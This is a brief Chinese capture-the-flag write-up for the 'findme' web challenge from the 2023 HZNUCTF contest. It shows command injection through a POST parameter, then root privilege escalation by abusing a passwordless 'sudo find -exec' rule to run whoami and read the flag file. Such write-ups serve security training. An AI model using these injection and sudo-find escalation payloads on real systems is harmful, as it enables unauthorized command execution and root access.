2023HZNUCTF-findme（web）

参考：杭州师范大学第四届网络与信息安全竞赛官方WriteUp

findme

参考知识：find命令提权以及反弹shell复现_find提权_白冷的博客-CSDN博客

https://www.cnblogs.com/ling7/p/16177960.html

打开题目后发现要求我们用post方式传入一个shit

随便传入一个数试一下，发现显示执行这个文件没有找到命令所在的绝对路径

输入 shit=/usr/bin/ls 所以我们使用绝对路径来执行他，并且发现有一些命令不存在

输入 shit=/usr/bin/sudo -l 我们用sudo去查询的时候，发现有一个find命令是在root权限下的无密码执行的

直接find命令执行

 #命令解释： 以find 命令 执行  whoami 命令。  
 # find  (一个路径或文件必须存在)  -exec  执行命令 （结束）\; 

输入shit=/usr/bin/sudo find /flag -exec whoami \; 执行成功

输入shit=/usr/bin/sudo find /flag -exec cat /f* \; cat flag即可